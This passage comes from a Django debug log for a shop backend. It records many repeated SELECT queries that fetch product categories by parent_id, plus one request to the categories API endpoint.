utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:15:37,365 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:15:37,369 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:15:37,373 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:15:37,377 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:15:37,381 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:15:37,387 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:15:37,389 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:15:37,392 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:15:37,394 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:15:37,396 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:15:37,398 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:15:37,401 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:15:37,404 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:15:37,406 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:15:37,408 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:15:37,410 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:15:37,414 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:15:37,416 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:15:37,418 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:15:37,420 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:15:37,422 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:15:37,426 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:15:37,428 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:15:37,430 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:15:37,432 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:15:37,435 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:15:37,437 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:15:37,440 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:15:37,442 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:15:37,444 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:15:37,447 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:15:37,449 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:15:37] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:15:37,613 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:15:37,623 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:15:37,628 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:15:37,631 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:15:37,635 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:15:37,639 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:15:37,642 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:15:37,646 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:15:37,650 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:15:37,655 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:15:37,659 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:15:37,662 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:15:37,666 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:15:37,670 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:15:37,676 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:15:37,679 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:15:37,682 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:15:37,686 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:15:37,689 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:15:37,694 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:15:37,698 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:15:37,701 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:15:37,704 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:15:37,708 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:15:37,711 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:15:37,716 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:15:37,720 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:15:37,723 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:15:37,726 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:15:37,730 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:15:37,735 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:15:37,738 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:15:37,741 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:15:37,745 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:15:37,748 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 